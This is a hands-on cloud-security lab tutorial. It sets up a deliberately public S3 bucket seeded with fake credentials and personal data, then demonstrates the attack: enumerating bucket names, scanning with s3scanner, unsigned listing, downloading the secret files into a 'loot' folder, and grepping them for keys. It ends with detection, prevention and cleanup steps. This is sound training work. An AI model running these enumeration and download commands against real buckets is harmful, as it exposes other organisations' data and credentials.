Prerequisites¶



- projectx-prod-vpc has been created with subnets configured.
- My-Desktop-Key-Pair key pair exists.
- AWS CLI configured with appropriate IAM credentials.

Network Topology¶

Overview¶

This guide demonstrates how to identify and exploit a misconfigured S3 bucket.

S3 bucket misconfigurations are one of the most common cloud security issues, often resulting from overly permissive bucket policies or disabled public access block settings.

In this scenario, we'll deploy a deliberately misconfigured S3 bucket that allows public read access, then demonstrate how an attacker can discover and exploit this vulnerability to access sensitive data.

What Makes an S3 Bucket Misconfigured?¶

S3 bucket misconfigurations typically occur when users unintentionally disable public access settings or apply overly broad bucket policies, granting public read or write permissions.

These mistakes often stem from a lack of understanding of AWS permissions, rushed deployments, or an attempt to make data easily shareable without considering the security implications.

S3 buckets can become exposed in several ways.

A few of the most common include:

- Public Access Block is disabled: This allows public access to be granted through bucket policies or ACLs. AWS now enables Block Public Access by default on new buckets, but historically S3 buckets were much easier to open to the public.

- Bucket Policy is overly permissive: The policy grants public read or list permissions, for example "Principal": "*" with s3:GetObject. This frequently happens when policy templates are copied and pasted without understanding what the bucket policy does.

- ACLs allow public access: Object-level permissions are set to public. For example, a few objects may have been made public on purpose while others were exposed by oversight.

- Versioning enabled without proper controls: Old versions of sensitive files remain accessible.

👉 In production environments, S3 buckets should follow the principle of least privilege and have Public Access Block enabled by default.
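To see which of these conditions applies to a bucket you own, you can query each setting with the AWS CLI. The sketch below wraps the relevant s3api calls in a function. The name audit_bucket_exposure is hypothetical, and it assumes credentials that can read the bucket's configuration. When a bucket has no Public Access Block configuration or no bucket policy, the CLI reports an error for that call, which is itself a useful finding.

```bash
# Hypothetical helper: print the settings that most often cause S3 exposure.
# Assumes the AWS CLI is configured with credentials that can read the bucket configuration.
audit_bucket_exposure() {
  local bucket="$1"

  echo "== Public Access Block =="
  # Errors with NoSuchPublicAccessBlockConfiguration if none is set on the bucket
  aws s3api get-public-access-block --bucket "$bucket"

  echo "== Bucket policy status =="
  # PolicyStatus.IsPublic is true when the bucket policy grants public access
  aws s3api get-bucket-policy-status --bucket "$bucket"

  echo "== Bucket ACL =="
  # Look for grants to the AllUsers or AuthenticatedUsers groups
  aws s3api get-bucket-acl --bucket "$bucket"

  echo "== Versioning =="
  aws s3api get-bucket-versioning --bucket "$bucket"
}

# Usage:
#   audit_bucket_exposure delete-me-projectx-leaky-bucket
```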

Deploy Misconfigured S3 Bucket¶

Run CloudFormation Template¶

Navigate to the CloudFormation service in the AWS Console.

Select Create stack ➔ Choose an existing template.

Choose Upload a template file and select the misconfigured-s3-bucket.yaml template from https://github.com/projectsecio/exercise-files/tree/main/cloud-attacks-101/attacks_cf_templates

Stack name: misconfigured-s3-bucket.

Leave all other settings at their defaults.

Select Submit.

👉 Add a unique suffix to the end of the bucket name so that the bucket name is globally unique.

Wait for the stack creation to complete. You can monitor the progress in the CloudFormation console.
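If you prefer the CLI, a sketch like the following waits for creation to finish and then prints the stack outputs, including the BucketName output that the upload script reads. The function name wait_for_stack is hypothetical. aws cloudformation wait stack-create-complete polls the stack and exits with a non-zero code if creation fails.

```bash
# Hypothetical helper: block until the stack finishes creating, then show its outputs.
wait_for_stack() {
  local stack="${1:-misconfigured-s3-bucket}"
  # Polls until CREATE_COMPLETE; returns non-zero if creation fails or times out
  aws cloudformation wait stack-create-complete --stack-name "$stack" || return 1
  # Print all outputs, including BucketName
  aws cloudformation describe-stacks --stack-name "$stack" \
    --query 'Stacks[0].Outputs' --output table
}

# Usage:
#   wait_for_stack misconfigured-s3-bucket
```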



Populate Bucket with Sample Data¶

To make this scenario realistic, we need to add some sample sensitive data to the bucket.

Copy the following into a new bash script called upload_s3_files.sh and run it with bash upload_s3_files.sh.

```bash
#!/usr/bin/env bash
# Stop on the first failed command, unset variable, or failed pipeline stage
set -euo pipefail

# Get the bucket name from CloudFormation outputs
BUCKET_NAME=$(aws cloudformation describe-stacks \
  --stack-name misconfigured-s3-bucket \
  --query 'Stacks[0].Outputs[?OutputKey==`BucketName`].OutputValue' \
  --output text)

# Stop early if the stack has no BucketName output
if [ -z "$BUCKET_NAME" ] || [ "$BUCKET_NAME" = "None" ]; then
  echo "Could not read BucketName from the misconfigured-s3-bucket stack" >&2
  exit 1
fi

# Create sample sensitive files
echo '{"db_host":"prod-database.internal","db_user":"admin","db_password":"SuperSecretPassword123!","db_name":"customer_data"}' > /tmp/database-credentials.json

echo 'user_id,email,ssn,credit_card
1,[email protected],123-45-6789,4532-1234-5678-9010
2,[email protected],987-65-4321,5555-1234-5678-9010' > /tmp/user-data-backup.csv

echo '2024-01-15 10:30:45 - Admin accessed sensitive data
2024-01-15 10:31:12 - User downloaded customer records
2024-01-15 10:32:00 - Database backup completed' > /tmp/access-logs.txt

echo 'AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
API_KEY=sk_live_51HqSOFKmS3g3E5rK9XpZ8dN2vL6mQ7wT4yU9i' > /tmp/api-keys.txt

# Upload files to S3 (quoted in case the name contains unexpected characters)
aws s3 cp /tmp/database-credentials.json "s3://$BUCKET_NAME/config/database-credentials.json"
aws s3 cp /tmp/user-data-backup.csv "s3://$BUCKET_NAME/backups/user-data-backup.csv"
aws s3 cp /tmp/access-logs.txt "s3://$BUCKET_NAME/logs/access-logs.txt"
aws s3 cp /tmp/api-keys.txt "s3://$BUCKET_NAME/secrets/api-keys.txt"

# Clean up local files
rm /tmp/database-credentials.json /tmp/user-data-backup.csv /tmp/access-logs.txt /tmp/api-keys.txt
```

👉 These files simulate common types of sensitive data that are often accidentally exposed, such as credentials, user data backups, access logs, and API keys. Real exposed buckets can also contain static files such as images.

Discovery¶

Identify the Bucket¶

Time to put on our attacker hat.

How do attackers find open and misconfigured S3 buckets?

There are several common methods:

Reconnaissance: Attackers search for open S3 buckets in the wild, for example through Google dorking or with open-source tools that catalog newly created buckets.

👉 Tools like s3scanner or bucket_finder are popular command-line tools used to automate the discovery of public S3 buckets.

Error messages: A misconfigured application can expose bucket names in its error messages.

Bucket enumeration: Attackers try common bucket naming patterns. It is a basic strategy, but it can work.

Public datasets: Bucket names may be listed in public repositories or forums. For example, the bucket URL may appear in a public GitHub repository, in documentation, or in a configuration file exposed to the public.
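Bucket enumeration can be sketched in a few lines of shell. Unauthenticated requests to https://NAME.s3.amazonaws.com/ usually return 200 when the bucket exists and can be listed publicly, 403 when it exists but is private, and 404 when no bucket has that name. The function names and the suffix list below are hypothetical and deliberately small. Real tools use large wordlists, and redirects such as 301 or 307 can also occur, so the sketch prints any other status as-is.

```bash
# Hypothetical generator: print a base name plus a few common suffixes.
# The suffix list is illustrative only.
candidate_buckets() {
  local base="$1" suffix
  echo "$base"
  for suffix in backup backups logs prod dev data assets; do
    echo "${base}-${suffix}"
  done
}

# Classify a bucket name by the HTTP status of an unauthenticated request:
# 200 = exists and publicly listable, 403 = exists but private, 404 = no such bucket
check_bucket() {
  local name="$1" code
  code="$(curl -s -o /dev/null -w '%{http_code}' "https://${name}.s3.amazonaws.com/")"
  case "$code" in
    200) echo "PUBLIC   $name" ;;
    403) echo "PRIVATE  $name" ;;
    404) echo "MISSING  $name" ;;
    *)   echo "HTTP $code $name" ;;
  esac
}

# Usage:
#   candidate_buckets projectx | while read -r name; do check_bucket "$name"; done
```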

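For this scenario, assume you've discovered the bucket name delete-me-projectx-leaky-bucket through reconnaissance. The commands below use that name; substitute your own bucket name, including any suffix you added.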

This optional step uses s3scanner on the [project-x-attacker] machine.

S3Scanner allows you to find open S3 buckets in AWS and other cloud providers.

Power on [project-x-attacker] and make sure it has Internet access. For the CA101 attack scenarios, you can set its network adapter to "Bridged Adapter".

Install s3scanner from the apt package (sudo apt install s3scanner). The packaged version may be slightly outdated, but that is fine for this exercise.

Once s3scanner is installed, you can scan a list of bucket names with -bucket-file my_list.txt, and add -enumerate to also list the objects in each accessible bucket.
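The list file is plain text with one bucket name per line. A small wrapper like the hypothetical scan_bucket_list below writes the names you pass to that file and runs the scan. The file name my_list.txt comes from the text above, and the second bucket name in the usage comment is an illustrative placeholder.

```bash
# Hypothetical helper: write bucket names (one per line) to a file, then scan them all.
# -enumerate also lists objects in accessible buckets, which can be slow on large buckets.
scan_bucket_list() {
  local list_file="$1"
  shift
  # One bucket name per line, the format -bucket-file reads
  printf '%s\n' "$@" > "$list_file"
  s3scanner -bucket-file "$list_file" -enumerate
}

# Usage:
#   scan_bucket_list my_list.txt delete-me-projectx-leaky-bucket projectx-backups
```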

To scan a single bucket, pass its name with the -bucket flag:

```bash
s3scanner -bucket delete-me-projectx-leaky-bucket
```

In the output, AllUsers shows READ permission, meaning any user, even without AWS credentials, can read the objects in this bucket.





Verify Public Access¶

First, verify that the bucket allows public access:
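A minimal way to run this check, assuming the bucket name used throughout this guide, is an unsigned aws s3 ls. The --no-sign-request flag tells the AWS CLI to send the request without credentials, so it only succeeds if anonymous users may list the bucket. The wrapper is_publicly_listable is hypothetical and simply reports the result:

```bash
# Hypothetical helper: succeed only if the bucket can be listed anonymously.
# --no-sign-request makes the AWS CLI send the request without any credentials.
is_publicly_listable() {
  if aws s3 ls "s3://$1" --no-sign-request > /dev/null 2>&1; then
    echo "PUBLIC: $1 can be listed without credentials"
  else
    echo "NOT LISTABLE: $1 rejected the anonymous request, does not exist, or the request failed"
    return 1
  fi
}

# Usage:
#   is_publicly_listable delete-me-projectx-leaky-bucket
```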

If this command succeeds without credentials, the bucket is publicly accessible.

You can also open the bucket URL (https://delete-me-projectx-leaky-bucket.s3.amazonaws.com/) in a web browser. If you can see an XML listing of the bucket contents without authentication, the bucket is misconfigured.
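The page the browser shows is the ListBucketResult XML that S3 returns for an anonymous GET on the bucket URL (https://BUCKET.s3.amazonaws.com/ in virtual-hosted style). The same request can be made with curl. The hypothetical helper below keeps only the text of the Key elements. It is a rough text filter rather than an XML parser: keys containing XML-escaped characters (such as &amp;) are printed escaped, and a single response lists at most 1,000 keys.

```bash
# Hypothetical helper: fetch the anonymous bucket listing and print only the object keys.
list_keys_via_http() {
  curl -s "https://$1.s3.amazonaws.com/" |
    grep -o '<Key>[^<]*</Key>' |   # one <Key>...</Key> match per output line
    sed -e 's/<Key>//' -e 's/<\/Key>//'
}

# Usage:
#   list_keys_via_http delete-me-projectx-leaky-bucket
```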



Enumeration Phase¶

List Bucket Contents¶



Once you've confirmed public access, enumerate all objects in the bucket:

```bash
# List all objects
aws s3 ls s3://delete-me-projectx-leaky-bucket --recursive --no-sign-request

# Get detailed information about objects
aws s3api list-objects-v2 \
  --bucket delete-me-projectx-leaky-bucket \
  --no-sign-request \
  --query 'Contents[*].[Key,Size,LastModified]' \
  --output table
```

Identify Sensitive Files¶

Look for files with names that suggest sensitive content:

- Files in config/, secrets/, backups/, or logs/ directories
- Files with extensions like .json, .csv, .txt, .sql, .pem, or .key
- Files with names containing keywords like "credentials", "password", "secret", or "key"
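These rules are easy to apply to a key listing with grep. The filter below is a hypothetical sketch that encodes the directories, extensions, and keywords above as one case-insensitive regular expression. Because "key" is one of the keywords, it will also flag harmless names that happen to contain that word.

```bash
# Hypothetical filter: read object keys on stdin (one per line) and print those that
# match the sensitive directories, extensions, or keywords (case-insensitive).
find_sensitive_keys() {
  grep -Ei '(^|/)(config|secrets|backups|logs)/|\.(json|csv|txt|sql|pem|key)$|credential|password|secret|key'
}

# Usage (text output separates keys with tabs, so split them onto lines first):
#   aws s3api list-objects-v2 --bucket delete-me-projectx-leaky-bucket --no-sign-request \
#     --query 'Contents[].Key' --output text | tr '\t' '\n' | find_sensitive_keys
```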

Exploitation Phase¶



Download Sensitive Files¶

Download files that appear to contain sensitive information:

```bash
# Download database credentials
aws s3 cp s3://delete-me-projectx-leaky-bucket/config/database-credentials.json . --no-sign-request

# Download user data backup
aws s3 cp s3://delete-me-projectx-leaky-bucket/backups/user-data-backup.csv . --no-sign-request

# Download access logs
aws s3 cp s3://delete-me-projectx-leaky-bucket/logs/access-logs.txt . --no-sign-request

# Download API keys
aws s3 cp s3://delete-me-projectx-leaky-bucket/secrets/api-keys.txt . --no-sign-request
```
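Rather than copying files one at a time, an attacker can mirror everything the bucket exposes with aws s3 sync. The helper name and the default ./loot destination below are hypothetical:

```bash
# Hypothetical helper: mirror every anonymously readable object into a local directory.
# aws s3 sync copies objects that are missing or changed in the destination.
download_bucket() {
  local bucket="$1" dest="${2:-./loot}"
  aws s3 sync "s3://$bucket" "$dest" --no-sign-request
}

# Usage:
#   download_bucket delete-me-projectx-leaky-bucket ./loot
```

aws s3 sync also accepts --exclude and --include filters, and filters that appear later take precedence. For example, --exclude "*" --include "secrets/*" would copy only the secrets/ prefix.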

Analyze Extracted Data¶

Examine the downloaded files for credentials, personal data, and details about internal systems.
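A quick first pass is to grep the downloaded files for patterns that usually indicate secrets or personal data. The sketch below is hypothetical and its patterns are illustrative, not exhaustive. It looks for AWS access key IDs (AKIA followed by 16 characters), the words password, secret, and api_key, SSN-shaped numbers, and card-number-shaped digit groups.

```bash
# Hypothetical helper: search a directory of downloaded files for common secret patterns.
# -r recurse, -n show line numbers, -I skip binary files, -i ignore case, -E extended regex
scan_for_secrets() {
  local dir="${1:-.}"
  grep -rnIiE \
    -e 'AKIA[0-9A-Z]{16}' \
    -e 'password|secret|api_key' \
    -e '[0-9]{3}-[0-9]{2}-[0-9]{4}' \
    -e '[0-9]{4}-[0-9]{4}-[0-9]{4}-[0-9]{4}' \
    "$dir"
}

# Usage (run in the directory where the files were downloaded):
#   scan_for_secrets .
```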

Potential Impact¶

Based on the extracted data, an attacker could:

- Database Access: Use credentials to connect to the production database

- Identity Theft: Use PII from user backups for social engineering or fraud

- Lateral Movement: Use API keys to access other AWS services

- Reconnaissance: Analyze logs to understand system architecture and user behavior

- Data Exfiltration: Download all accessible data for further analysis

👉 In a real attack, the attacker would likely use this information to gain further access to the organization's infrastructure.

Detection and Prevention¶

How to Detect Misconfigured Buckets¶

- AWS Config: Enable rules to detect public S3 buckets

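- CloudTrail: Monitor S3 API calls for unusual access patterns (object-level calls such as GetObject are logged only when S3 data events are enabled)

- GuardDuty: Detect suspicious access to S3 buckets with S3 Protection enabled

- IAM Access Analyzer: Identify resources accessible from outside your account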

- Regular Audits: Periodically review bucket policies and public access settings
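As one example of the AWS Config approach, the AWS managed rule S3_BUCKET_PUBLIC_READ_PROHIBITED flags buckets that allow public read access. The sketch below assumes an AWS Config configuration recorder is already running in the account and Region. The function name is hypothetical, and the compliance query may return no results until the rule's first evaluation completes.

```bash
# Hypothetical helper: add the AWS managed rule that flags publicly readable buckets,
# then report its compliance results. Assumes an AWS Config recorder is already running.
enable_public_read_rule() {
  aws configservice put-config-rule --config-rule '{
    "ConfigRuleName": "s3-bucket-public-read-prohibited",
    "Source": {"Owner": "AWS", "SourceIdentifier": "S3_BUCKET_PUBLIC_READ_PROHIBITED"},
    "Scope": {"ComplianceResourceTypes": ["AWS::S3::Bucket"]}
  }'
  aws configservice describe-compliance-by-config-rule \
    --config-rule-names s3-bucket-public-read-prohibited
}
```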

Best Practices for S3 Security¶

- Enable Public Access Block: Block all public access by default

- Use Least Privilege: Grant only necessary permissions in bucket policies

- Enable Encryption: Use server-side encryption (SSE) for all objects

- Enable Versioning with Lifecycle Policies: Automatically delete old versions

- Enable Access Logging: Monitor who accesses your buckets

- Use IAM Policies: Control access at the IAM level, not just bucket policies

- Regular Audits: Review bucket configurations regularly

👉 Always follow the principle of least privilege when configuring S3 bucket permissions.
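Applying the first practice to a single bucket takes one call. The hypothetical helper below enables all four Public Access Block settings and then reads the configuration back to confirm it. The same settings can be applied to every bucket in an account with aws s3control put-public-access-block --account-id YOUR_ACCOUNT_ID.

```bash
# Hypothetical helper: enable all four Public Access Block settings on one bucket.
lock_down_bucket() {
  local bucket="$1"
  aws s3api put-public-access-block --bucket "$bucket" \
    --public-access-block-configuration \
    BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true
  # Read the configuration back to confirm it was applied
  aws s3api get-public-access-block --bucket "$bucket"
}

# Usage:
#   lock_down_bucket delete-me-projectx-leaky-bucket
```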

Cleanup¶

Warning

After completing this exercise, delete all objects inside the S3 bucket. Then select the misconfigured-s3-bucket stack in CloudFormation and choose Delete to remove all resources.

Wait for the stack deletion to complete. You can monitor the progress in the CloudFormation console.
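From the CLI, the whole cleanup can be scripted. The hypothetical helper below empties the bucket, deletes the stack, and waits for deletion to finish. It assumes versioning is not enabled on the bucket. If it is, old object versions and delete markers must also be removed before CloudFormation can delete the bucket.

```bash
# Hypothetical helper: empty the bucket, delete the stack, and wait for deletion.
# Assumes the bucket is not versioned (aws s3 rm does not remove old versions).
cleanup_lab() {
  local bucket="$1" stack="${2:-misconfigured-s3-bucket}"
  aws s3 rm "s3://$bucket" --recursive || return 1
  aws cloudformation delete-stack --stack-name "$stack" || return 1
  # Blocks until DELETE_COMPLETE; returns non-zero if deletion fails
  aws cloudformation wait stack-delete-complete --stack-name "$stack"
}

# Usage:
#   cleanup_lab delete-me-projectx-leaky-bucket
```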

👉 Ensure the bucket is empty before deletion, or CloudFormation will fail to delete the stack.